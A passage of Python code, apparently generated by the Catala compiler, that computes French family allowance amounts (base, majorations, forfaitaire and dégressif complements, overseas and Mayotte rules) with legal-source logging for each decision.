"âge_minimum_alinéa_1_l521_3", "input"],
param_378))))))):
return True
else:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
return False
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=132,
start_column=11,
end_line=132,
end_column=34,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=132, start_column=11,
end_line=132, end_column=34,
law_headings=["Prologue"]))
droit_ouvert_majoration_376 = log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration"], local_var_377)
try:
def local_var_380(param_381: Money):
try:
try:
def local_var_388(_: Any):
return money_of_cents_string("0")
def local_var_386(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=141, start_column=11,
end_line=141, end_column=31,
law_headings=["Prologue"]), True)
def local_var_384(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=162, start_column=5,
end_line=163, end_column=68,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and
(ressources_menage_103 <=
(plafond__i_d521_3_252 + (param_381 *
decimal_of_string("12.")))))):
return ((plafond__i_d521_3_252 +
((param_381 * decimal_of_string("12.")) -
ressources_menage_103)) *
(decimal_of_string("1.") /
decimal_of_string("12.")))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_382(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=170, start_column=5,
end_line=171, end_column=68,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_i_d521_3_238) and
(ressources_menage_103 <=
(plafond__i_i_d521_3_238 + (param_381 *
decimal_of_string("12.")))))):
return ((plafond__i_i_d521_3_238 +
((param_381 * decimal_of_string("12.")) -
ressources_menage_103)) *
(decimal_of_string("1.") /
decimal_of_string("12.")))
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_382, local_var_384],
local_var_386, local_var_388)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=141,
start_column=11,
end_line=141,
end_column=31,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=141, start_column=11,
end_line=141, end_column=31,
law_headings=["Prologue"]))
complement_degressif_379 = log_variable_definition(["AllocationsFamiliales",
"complément_dégressif"], local_var_380)
try:
def local_var_400(_: Any):
raise EmptyError
def local_var_398(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=128, start_column=11, end_line=128, end_column=47,
law_headings=["Prologue"]), True)
def local_var_396(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=215, start_column=5,
end_line=215, end_column=43,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 <=
plafond__i_d521_3_252)):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.20234"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_394(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=229, start_column=5,
end_line=230, end_column=46,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and (ressources_menage_103 <=
plafond__i_i_d521_3_238))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1117"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_392(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=243, start_column=5,
end_line=243, end_column=43,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 >
plafond__i_i_d521_3_238)):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0559"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_391 = handle_default([local_var_392, local_var_394,
local_var_396], local_var_398,
local_var_400)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=128, start_column=11,
end_line=128, end_column=47,
law_headings=["Prologue"]))
montant_verse_forfaitaire_par_enfant_390 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_forfaitaire_par_enfant"], local_var_391)
try:
def local_var_412(_: Any):
raise EmptyError
def local_var_410(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=112, start_column=11, end_line=112, end_column=56,
law_headings=["Prologue"]), True)
def local_var_408(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=35, start_column=3,
end_line=35, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 <=
plafond__i_d521_3_252)):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return ((prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.41")) *
decimal_of_integer((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) -
integer_of_string("2"))))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_406(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=74, start_column=3,
end_line=75, end_column=44,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and (ressources_menage_103 <=
plafond__i_i_d521_3_238))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return ((prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.205")) *
decimal_of_integer((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) -
integer_of_string("2"))))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_404(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=113, start_column=3,
end_line=113, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 >
plafond__i_i_d521_3_238)):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("2")):
return ((prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.1025")) *
decimal_of_integer((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) -
integer_of_string("2"))))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_403 = handle_default([local_var_404, local_var_406,
local_var_408], local_var_410,
local_var_412)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=112, start_column=11,
end_line=112, end_column=56,
law_headings=["Prologue"]))
montant_initial_base_troisieme_enfant_et_plus_402 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_troisième_enfant_et_plus"], local_var_403)
try:
def local_var_424(_: Any):
raise EmptyError
def local_var_422(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=111, start_column=11, end_line=111, end_column=47,
law_headings=["Prologue"]), True)
def local_var_420(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=35, start_column=3,
end_line=35, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 <=
plafond__i_d521_3_252)):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.32"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_418(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=74, start_column=3,
end_line=75, end_column=44,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and (ressources_menage_103 <=
plafond__i_i_d521_3_238))):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.16"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_416(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=113, start_column=3,
end_line=113, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (ressources_menage_103 >
plafond__i_i_d521_3_238)):
if (list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) >
integer_of_string("1")):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.08"))
else:
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_415 = handle_default([local_var_416, local_var_418,
local_var_420], local_var_422,
local_var_424)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=111, start_column=11,
end_line=111, end_column=47,
law_headings=["Prologue"]))
montant_initial_base_deuxieme_enfant_414 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base_deuxième_enfant"], local_var_415)
try:
try:
try:
if (nombre_total_enfants_353 ==
decimal_of_string("0.")):
local_var_427 = decimal_of_string("0.")
else:
local_var_427 = (nombre_moyen_enfants_355 /
nombre_total_enfants_353)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=113, start_column=11,
end_line=113, end_column=38,
law_headings=["Prologue"]))
rapport_enfants_total_moyen_426 = log_variable_definition(["AllocationsFamiliales",
"rapport_enfants_total_moyen"], local_var_427)
try:
def local_var_429(param_430: Enfant):
try:
def local_var_441(_: Any):
raise EmptyError
def local_var_439(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=133, start_column=11,
end_line=133, end_column=47,
law_headings=["Prologue"]), True)
def local_var_437(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=55, start_column=3,
end_line=55, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 <=
plafond__i_d521_3_252) and
log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_430)))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.16"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_435(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=95, start_column=3,
end_line=96, end_column=44,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (((ressources_menage_103 >
plafond__i_d521_3_252) and
(ressources_menage_103 <=
plafond__i_i_d521_3_238)) and
log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_430)))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.08"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_433(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=132, start_column=3,
end_line=132, end_column=41,
law_headings=["Article D521-1",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_i_d521_3_238) and
log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_430)))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.04"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_431(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./epilogue.catala_fr",
start_line=27, start_column=5,
end_line=27, end_column=44,
law_headings=["Règles diverses", "Épilogue",
"Décrets divers"]), not log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_430))))):
return money_of_cents_string("0")
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_431, local_var_433,
local_var_435, local_var_437],
local_var_439, local_var_441)
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=133,
start_column=11,
end_line=133,
end_column=47,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=133, start_column=11,
end_line=133, end_column=47,
law_headings=["Prologue"]))
montant_initial_metropole_majoration_428 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_métropole_majoration"], local_var_429)
try:
try:
try:
def local_var_445(acc_446: Integer, enfant_447: Any):
if log_end_call(["AllocationsFamiliales",
"droit_ouvert_forfaitaire"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_forfaitaire", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_forfaitaire"],
droit_ouvert_forfaitaire_268,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_forfaitaire", "input"],
enfant_447)))):
return (acc_446 + integer_of_string("1"))
else:
return acc_446
local_var_444 = (montant_verse_forfaitaire_par_enfant_390 *
decimal_of_integer(list_fold_left(local_var_445,
integer_of_string(
"0"),
enfants_a_charge_106)))
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=129, start_column=11,
end_line=129, end_column=36,
law_headings=["Prologue"]))
montant_verse_forfaitaire_443 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_forfaitaire"], local_var_444)
try:
try:
def local_var_456(_: Any):
try:
return (montant_initial_base_deuxieme_enfant_414 +
montant_initial_base_troisieme_enfant_et_plus_402)
except EmptyError:
raise EmptyError
def local_var_454(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=109, start_column=11,
end_line=109, end_column=31,
law_headings=["Prologue"]), True)
def local_var_452(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=350, start_column=5,
end_line=351, end_column=69,
law_headings=["Article D755-5",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Départements d'outre-mer",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (prestations_familiales_dot_regime_outre_mer_l751_1_221 and
(list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")))):
return montant_initial_base_premier_enfant_364
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_450(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./decrets_divers.catala_fr",
start_line=335, start_column=5,
end_line=335, end_column=24,
law_headings=["Article 7",
"Décret n°2002-423 du 29 mars 2002 relatif aux prestations familiales à Mayotte",
"Dispositions spéciales relatives à Mayotte",
"Décrets divers"]), (residence_104 ==
Collectivite(Collectivite_Code.Mayotte,
Unit()))):
return (montant_initial_base_premier_enfant_mayotte_325 +
(montant_initial_base_deuxieme_enfant_mayotte_299 +
(montant_initial_base_troisieme_enfant_mayotte_273 +
montant_initial_base_quatrieme_enfant_et_plus_mayotte_271)))
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_449 = handle_default([local_var_450, local_var_452],
local_var_454, local_var_456)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=109, start_column=11,
end_line=109, end_column=31,
law_headings=["Prologue"]))
montant_initial_base_448 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_base"], local_var_449)
try:
def local_var_459(param_460: Enfant):
try:
try:
def local_var_467(_: Any):
try:
return log_end_call(["AllocationsFamiliales",
"montant_initial_métropole_majoration"],
log_variable_definition(["AllocationsFamiliales",
"montant_initial_métropole_majoration",
"output"],
log_begin_call(["AllocationsFamiliales",
"montant_initial_métropole_majoration"],
montant_initial_metropole_majoration_428,
log_variable_definition(["AllocationsFamiliales",
"montant_initial_métropole_majoration",
"input"], param_460))))
except EmptyError:
raise EmptyError
def local_var_465(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=134, start_column=11,
end_line=134, end_column=37,
law_headings=["Prologue"]), True)
def local_var_463(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=373, start_column=5,
end_line=376, end_column=42,
law_headings=["Article D755-5",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Départements d'outre-mer",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_460)))) and
(prestations_familiales_dot_regime_outre_mer_l751_1_221 and
((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")) and
((param_460.age >=
integer_of_string("11")) and (param_460.age <
integer_of_string("16"))))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0369"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_461(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=382, start_column=5,
end_line=385, end_column=23,
law_headings=["Article D755-5",
"Chapitre 5 : Prestations familiales et prestations assimilées",
"Titre 5 : Départements d'outre-mer",
"Livre 7 : Régimes divers - Dispositions diverses",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), (log_end_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"droit_ouvert_majoration"],
droit_ouvert_majoration_376,
log_variable_definition(["AllocationsFamiliales",
"droit_ouvert_majoration", "input"],
param_460)))) and
(prestations_familiales_dot_regime_outre_mer_l751_1_221 and
((list_length(enfants_a_charge_droit_ouvert_prestation_familiale_231) ==
integer_of_string("1")) and (param_460.age >=
integer_of_string("16")))))):
return (prestations_familiales_dot_base_mensuelle_222 *
decimal_of_string("0.0567"))
else:
raise EmptyError
except EmptyError:
raise EmptyError
return handle_default([local_var_461, local_var_463],
local_var_465, local_var_467)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=134,
start_column=11,
end_line=134,
end_column=37,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=134, start_column=11,
end_line=134, end_column=37,
law_headings=["Prologue"]))
montant_initial_majoration_458 = log_variable_definition(["AllocationsFamiliales",
"montant_initial_majoration"], local_var_459)
try:
try:
def local_var_477(_: Any):
return money_of_cents_string("0")
def local_var_475(_: Any):
return log_decision_taken(SourcePosition(filename="./prologue.catala_fr",
start_line=143, start_column=11,
end_line=143, end_column=52,
law_headings=["Prologue"]), True)
def local_var_473(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=262, start_column=5,
end_line=264, end_column=42,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_d521_3_252) and (ressources_menage_103 <=
(plafond__i_d521_3_252 +
(montant_verse_forfaitaire_443 *
decimal_of_string("12.")))))):
return ((plafond__i_d521_3_252 +
((montant_verse_forfaitaire_443 *
decimal_of_string("12.")) -
ressources_menage_103)) *
(decimal_of_string("1.") /
decimal_of_string("12.")))
else:
raise EmptyError
except EmptyError:
raise EmptyError
def local_var_471(_: Any):
try:
if log_decision_taken(SourcePosition(filename="./securite_sociale_D.catala_fr",
start_line=272, start_column=5,
end_line=274, end_column=41,
law_headings=["Article D521-2",
"Chapitre 1er : Allocations familiales",
"Titre 2 : Prestations générales d'entretien",
"Livre 5 : Prestations familiales et prestations assimilées",
"Partie réglementaire - Décrets simples",
"Code de la sécurité sociale"]), ((ressources_menage_103 >
plafond__i_i_d521_3_238) and
(ressources_menage_103 <= (plafond__i_i_d521_3_238 +
(montant_verse_forfaitaire_443 *
decimal_of_string("12.")))))):
return ((plafond__i_i_d521_3_238 +
((montant_verse_forfaitaire_443 *
decimal_of_string("12.")) -
ressources_menage_103)) *
(decimal_of_string("1.") /
decimal_of_string("12.")))
else:
raise EmptyError
except EmptyError:
raise EmptyError
local_var_470 = handle_default([local_var_471, local_var_473],
local_var_475, local_var_477)
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=143, start_column=11,
end_line=143, end_column=52,
law_headings=["Prologue"]))
montant_verse_complement_pour_forfaitaire_469 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_complément_pour_forfaitaire"], local_var_470)
try:
try:
try:
local_var_480 = (montant_initial_base_448 *
rapport_enfants_total_moyen_426)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=116, start_column=11,
end_line=116, end_column=43,
law_headings=["Prologue"]))
montant_avec_garde_alternee_base_479 = log_variable_definition(["AllocationsFamiliales",
"montant_avec_garde_alternée_base"], local_var_480)
try:
def local_var_482(param_483: Enfant):
try:
try:
try:
match_arg_557 = log_end_call(["AllocationsFamiliales",
"prise_en_compte"],
log_variable_definition(["AllocationsFamiliales",
"prise_en_compte", "output"],
log_begin_call(["AllocationsFamiliales",
"prise_en_compte"], prise_en_compte_108,
log_variable_definition(["AllocationsFamiliales",
"prise_en_compte", "input"],
param_483))))
if match_arg_557.code == PriseEnCompte_Code.Complete:
_ = match_arg_557.value
local_var_484 = decimal_of_string("1.")
elif match_arg_557.code == PriseEnCompte_Code.Partagee:
_ = match_arg_557.value
local_var_484 = decimal_of_string("0.5")
elif match_arg_557.code == PriseEnCompte_Code.Zero:
_ = match_arg_557.value
local_var_484 = decimal_of_string("0.")
return (log_end_call(["AllocationsFamiliales",
"montant_initial_majoration"],
log_variable_definition(["AllocationsFamiliales",
"montant_initial_majoration", "output"],
log_begin_call(["AllocationsFamiliales",
"montant_initial_majoration"],
montant_initial_majoration_458,
log_variable_definition(["AllocationsFamiliales",
"montant_initial_majoration", "input"],
param_483)))) * local_var_484)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=135,
start_column=11,
end_line=135,
end_column=49,
law_headings=["Prologue"]))
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=135, start_column=11,
end_line=135, end_column=49,
law_headings=["Prologue"]))
montant_avec_garde_alternee_majoration_481 = log_variable_definition(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration"], local_var_482)
try:
try:
try:
if droit_ouvert_base_366:
local_var_489 = montant_avec_garde_alternee_base_479
else:
local_var_489 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=117, start_column=11,
end_line=117, end_column=29,
law_headings=["Prologue"]))
montant_verse_base_488 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_base"], local_var_489)
try:
try:
try:
if droit_ouvert_base_366:
def local_var_492(acc_493: Money, enfant_494: Any):
return (acc_493 +
log_end_call(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration"],
log_variable_definition(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration",
"output"],
log_begin_call(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration"],
montant_avec_garde_alternee_majoration_481,
log_variable_definition(["AllocationsFamiliales",
"montant_avec_garde_alternée_majoration",
"input"], enfant_494)))))
local_var_491 = list_fold_left(local_var_492,
money_of_cents_string("0"),
enfants_a_charge_106)
else:
local_var_491 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=136, start_column=11,
end_line=136, end_column=35,
law_headings=["Prologue"]))
montant_verse_majoration_490 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_majoration"], local_var_491)
try:
try:
try:
local_var_496 = (montant_verse_base_488 +
montant_verse_majoration_490)
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=140, start_column=11,
end_line=140, end_column=58,
law_headings=["Prologue"]))
montant_base_complement_pour_base_et_majoration_495 = log_variable_definition(["AllocationsFamiliales",
"montant_base_complément_pour_base_et_majoration"], local_var_496)
try:
try:
try:
if droit_ouvert_complement_266:
local_var_498 = log_end_call(["AllocationsFamiliales",
"complément_dégressif"],
log_variable_definition(["AllocationsFamiliales",
"complément_dégressif", "output"],
log_begin_call(["AllocationsFamiliales",
"complément_dégressif"], complement_degressif_379,
log_variable_definition(["AllocationsFamiliales",
"complément_dégressif", "input"],
montant_base_complement_pour_base_et_majoration_495))))
else:
local_var_498 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=142, start_column=11,
end_line=142, end_column=59,
law_headings=["Prologue"]))
montant_verse_complement_pour_base_et_majoration_497 = log_variable_definition(["AllocationsFamiliales",
"montant_versé_complément_pour_base_et_majoration"], local_var_498)
try:
try:
try:
if droit_ouvert_base_366:
local_var_500 = (montant_verse_base_488 +
(montant_verse_majoration_490 +
(montant_verse_forfaitaire_443 +
(montant_verse_complement_pour_base_et_majoration_497 +
montant_verse_complement_pour_forfaitaire_469))))
else:
local_var_500 = money_of_cents_string("0")
except EmptyError:
raise EmptyError
except EmptyError:
raise EmptyError
except EmptyError:
raise NoValueProvided(SourcePosition(filename="./prologue.catala_fr",
start_line=105, start_column=10,
end_line=105, end_column=23,
law_headings=["Prologue"]))
montant_verse_499 = log_variable_definition(["AllocationsFamiliales",
"montant_versé"], local_var_500)
try:
local_var_501 = (personne_charge_effective_permanente_est_parent_101 or
(not personne_charge_effective_permanente_est_parent_101 and
personne_charge_effective_permanente_remplit_titre__i_102))
except EmptyError:
